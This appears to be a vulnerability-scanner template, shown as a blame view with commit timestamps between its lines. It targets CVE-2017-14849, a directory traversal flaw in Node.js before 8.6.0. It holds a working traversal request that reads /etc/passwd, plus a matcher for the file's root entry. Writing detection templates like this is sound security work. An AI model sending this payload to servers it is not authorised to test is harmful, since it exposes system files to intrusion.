2021-01-02 05:02:50 +00:00
id : CVE-2017-14849
2020-08-19 15:34:31 +00:00
info :
2022-06-09 20:35:21 +00:00
name : Node.js <8.6.0 - Directory Traversal
2021-06-09 12:20:56 +00:00
author : Random_Robbie
2020-08-19 15:34:31 +00:00
severity : high
2022-06-09 20:35:21 +00:00
description : Node.js before 8.6.0 allows remote attackers to access unintended files because a change to ".." handling is incompatible with the pathname validation used by unspecified community modules.
2021-09-10 11:26:40 +00:00
reference :
- https://twitter.com/nodejs/status/913131152868876288
- https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/
2022-06-09 20:35:21 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-14849
2022-04-22 10:38:41 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2017-14849
cwe-id : CWE-22
2023-07-11 19:49:27 +00:00
epss-score : 0.96872
cpe : cpe:2.3:a:nodejs:node.js:8.5.0:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : nodejs
product : node.js
tags : cve,cve2017,nodejs,lfi
2020-08-19 15:34:31 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-08-19 15:34:31 +00:00
- method : GET
path :
- "{{BaseURL}}/static/../../../a/../../../../etc/passwd"
2023-07-11 19:49:27 +00:00
2020-08-19 15:34:31 +00:00
matchers-condition : and
matchers :
- type : regex
2023-07-11 19:49:27 +00:00
part : body
2020-08-19 15:34:31 +00:00
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200